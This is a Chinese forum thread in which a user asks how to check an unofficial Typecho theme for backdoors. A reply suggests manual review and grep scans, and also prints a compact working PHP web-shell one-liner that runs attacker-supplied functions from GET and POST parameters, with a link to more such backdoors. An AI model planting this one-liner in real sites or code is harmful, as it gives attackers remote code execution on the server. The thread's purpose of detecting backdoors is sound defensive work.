怎么知道typecho非官方主题是否有恶意代码/后门
这个主题太漂亮啦!我想使用他,但是担心有恶意代码/后门。请问怎么确认他是安全的呢?
正所谓 防人之心不可无 嘛。。呃,求高手支招!
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
这个主题太漂亮啦!我想使用他,但是担心有恶意代码/后门。请问怎么确认他是安全的呢?
正所谓 防人之心不可无 嘛。。呃,求高手支招!
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
发布评论
评论(1)
这个也没啥万能工具吧... 最好还是一个一个文件审查.
php后门, 可能最常用的是eval(xxx), 这种倒是容易捉,带有比较明显的关键词.可以搭配grep/ack扫这些关键词.
不好捉的倒是这种强悍的
<?php ($_=@$_GET[2]).@$_($_POST[1])?>(这个我还真用过)更多强悍的后门: http://www.freebuf.com/articles/web/9396.html
还真没啥特殊关键词吧! 所以最好还是一个一个文件的找.
javascript这一块也得瞧瞧.
update, 仔细想想,这些后门,输入都是得从用户这边过来. 所以可以这样查
grep -nHP -A 3 -B 3 '\$_[A-Z]' -r .